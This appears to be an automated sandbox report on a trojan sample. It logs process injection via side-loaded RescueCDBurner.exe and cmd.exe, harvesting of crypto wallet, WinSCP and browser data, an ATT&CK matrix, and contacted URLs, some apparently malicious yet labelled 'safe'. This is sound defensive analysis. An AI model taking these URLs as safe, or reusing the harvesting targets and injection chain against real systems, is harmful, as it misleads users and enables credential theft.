Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC0362E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF72FC08A19	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC53F0C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC1C79D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FFBCB784B5E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDelayExecution: Direct from: 0x7FF72FCF012A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF72FD737DB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC23116	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtMapViewOfSection: Direct from: 0x7FF72FBEF4BE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF72FCC5183	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDeviceIoControlFile: Direct from: 0x7FF72FC87976	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF72FD7800D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF72FBF8AA9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDelayExecution: Direct from: 0x7FF72FCEEC2D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB80D97	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF72FBFD346	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB63D92	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCDB955	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF72FC270E4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF72FCC4AC4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF72FC7D833	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtEnumerateValueKey: Direct from: 0x7FF72FCB465D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCD363D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC08C3E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF72FCC48B3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC04A3D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	NtSetInformationThread: Direct from: 0x6E5D7B9C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF72FC08340	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FC9E0D3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtOpenKeyEx: Direct from: 0x7FF72FC25EEC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FCEB251	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB6C4D3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF72FC264A6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadFile: Direct from: 0x14011D832	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB7399F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF72FB6E868	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateFile: Direct from: 0x7FF72FD75B77	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateFile: Direct from: 0x14011D7A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtMapViewOfSection: Direct from: 0x7FF72FBEF5AA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadFile: Direct from: 0x7FF72FBFCDCA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateThreadEx: Direct from: 0x7FF72FB641BF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x140120A3C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 242010	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 3EE010	Jump to behavior

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3EE0F _LogonUser_@24,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,LogonUserA,GlobalFree,GlobalFree,GlobalFree,

2_2_5BB3EE0F

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe "C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=532 -burn.filehandle.self=520	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009D1719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,

1_2_009D1719

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009D3A5F AllocateAndInitializeSid,CheckTokenMembership,

1_2_009D3A5F

Source: RescueCDBurner.exe, 00000003.00000002.1662531402.0000000009BC5000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1722810735.0000000009F39000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1982900431.000000000546B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd
Source: RescueCDBurner.exe, 00000003.00000002.1665024667.000000006CC2E000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: lChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect
Source: RescueCDBurner.exe, 00000004.00000002.1724425061.000000006BB6E000.00000002.00000001.01000000.00000017.sdmp	Binary or memory string: kChangeWindowMessageFilterChangeWindowMessageFilterExTaskbarCreatedToolbarWindow32SysPagerTrayNotifyWndShell_TrayWndShell_NotifyIconGetRect

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009BEC07 cpuid

1_2_009BEC07

Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Code function: _GetLocaleInfo_@16,SetLastError,newMultiByteFromWideCharSize,GetLocaleInfoA,MultiByteToWideChar,GlobalFree,

2_2_5BB32D1A

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009A4EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,

1_2_009A4EDF

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_00996037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,

1_2_00996037

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009961DF GetUserNameW,GetLastError,

1_2_009961DF

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_009D887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,

1_2_009D887B

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 1_2_00995195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,

1_2_00995195

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kz8kl7vh.default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	4 Native API	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	12 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 Create Account	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	11 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	4 Windows Service	21 Access Token Manipulation	1 Software Packing	NTDS	14 File and Directory Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	4 Windows Service	11 DLL Side-Loading	LSA Secrets	147 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	213 Process Injection	1 File Deletion	Cached Domain Credentials	221 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	213 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Indicator Removal	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
24EPV9vjc5.exe	47%	ReversingLabs	Win32.Trojan.Nekark

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\cooisyadg	26%	ReversingLabs	Win64.Trojan.Ulise
C:\Users\user\AppData\Local\Temp\fffwkwbrsb	26%	ReversingLabs	Win64.Trojan.Ulise
C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	3%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll	0%	ReversingLabs
C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	47%	ReversingLabs	Win32.Trojan.Nekark
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\Fondue.dll	0%	ReversingLabs
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtCore4.dll	0%	ReversingLabs
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtGui4.dll	0%	ReversingLabs
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtNetwork4.dll	0%	ReversingLabs
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\QtXml4.dll	0%	ReversingLabs
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	3%	ReversingLabs
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\StarBurn.dll	0%	ReversingLabs
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\msvcp100.dll	0%	ReversingLabs
C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\msvcr100.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.softwareok.de	0%	Avira URL Cloud	safe
https://downloads.reneelab.com/download_api.php	0%	Avira URL Cloud	safe
http://b.chenall.net/menu.lst	0%	Avira URL Cloud	safe
http://bug.reneelab.com	0%	Avira URL Cloud	safe
http://www.reneelab.it/	0%	Avira URL Cloud	safe
https://bamarelakij.site/95xk	0%	Avira URL Cloud	safe
https://bamarelakij.site:443r	0%	Avira URL Cloud	safe
https://downloads.reneelab.com/passnow/passnow_cnhttps://downloads.reneelab.com.cn/passnow/passnow_x	0%	Avira URL Cloud	safe
http://www.reneelab.ru/	0%	Avira URL Cloud	safe
http://www.reneelab.biz/	0%	Avira URL Cloud	safe
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW	0%	Avira URL Cloud	safe
http://grub4dos.chenall.net/e/%u)	0%	Avira URL Cloud	safe
http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstore	0%	Avira URL Cloud	safe
http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespa	0%	Avira URL Cloud	safe
http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	0%	Avira URL Cloud	safe
http://www.reneelab.es/	0%	Avira URL Cloud	safe
https://avrupabaski.com/wp-content/upgrade/wsn.exe	0%	Avira URL Cloud	safe
http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	0%	Avira URL Cloud	safe
http://www.reneelab.kr/	0%	Avira URL Cloud	safe
http://www.reneelab.jp/	0%	Avira URL Cloud	safe
http://www.reneelab.net/	0%	Avira URL Cloud	safe
http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/n	0%	Avira URL Cloud	safe
http://www.winimage.com/zLibDll1.2.6	0%	Avira URL Cloud	safe
http://www.reneelab.it/reimpostare-passwordi-di-windows-login.html	0%	Avira URL Cloud	safe
http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()	0%	Avira URL Cloud	safe
https://downloads.reneelab.com.cn/passnow/passnow_	0%	Avira URL Cloud	safe
http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/	0%	Avira URL Cloud	safe
https://ntp.msn.comd	0%	Avira URL Cloud	safe
http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItalia	0%	Avira URL Cloud	safe
http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurcha	0%	Avira URL Cloud	safe
http://support.reneelab.com/anonymous_requests/new	0%	Avira URL Cloud	safe
http://www.reneelab.fr/	0%	Avira URL Cloud	safe
https://downloads.reneelab.com.cn/download_api.php	0%	Avira URL Cloud	safe
https://bamarelakij.site/	0%	Avira URL Cloud	safe
https://bamarelakij.site/han.html	0%	Avira URL Cloud	safe
http://www.reneelab.cc/	0%	Avira URL Cloud	safe
https://bamarelakij.site:443	0%	Avira URL Cloud	safe
http://www.reneelab.de/	0%	Avira URL Cloud	safe
http://isecure-a.reneelab.com/webapi.php?code=	0%	Avira URL Cloud	safe
https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?ac	0%	Avira URL Cloud	safe
http://bugreports.qt-project.org/	0%	Avira URL Cloud	safe
http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipbo	0%	Avira URL Cloud	safe
https://bamarelakij.site/han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D	0%	Avira URL Cloud	safe
https://www.reneelab.com	0%	Avira URL Cloud	safe
http://www.reneelab.com.cn/	0%	Avira URL Cloud	safe
https://www.reneelab.comwww.reneelab.comhttp://https://0	0%	Avira URL Cloud	safe
http://www.reneelab.pl/	0%	Avira URL Cloud	safe
https://downloads.reneelab.com/passnow/passnow_	0%	Avira URL Cloud	safe
http://www.???.xx/?search=%s	0%	Avira URL Cloud	safe
http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newst	0%	Avira URL Cloud	safe
http://isecure.reneelab.com.cn/webapi.php?code=	0%	Avira URL Cloud	safe
http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.244.18.122	true	false	high
googlehosted.l.googleusercontent.com	172.217.18.97	true	false	high
bamarelakij.site	172.67.174.91	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430155821&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://sb.scorecardresearch.com/b?rn=1736430155824&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0CF28CAF1D4764FC3C1D99C01CEF65B6&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false		high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158155&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://c.msn.com/c.gif?rnd=1736430155823&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8c5c06be53d4ef49888d26564492b1c&activityId=a8c5c06be53d4ef49888d26564492b1c&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0	false		high
https://c.msn.com/c.gif?rnd=1736430155823&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8c5c06be53d4ef49888d26564492b1c&activityId=a8c5c06be53d4ef49888d26564492b1c&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=23380C341E47475980EC0B27EFDB0DFE&MUID=0CF28CAF1D4764FC3C1D99C01CEF65B6	false		high
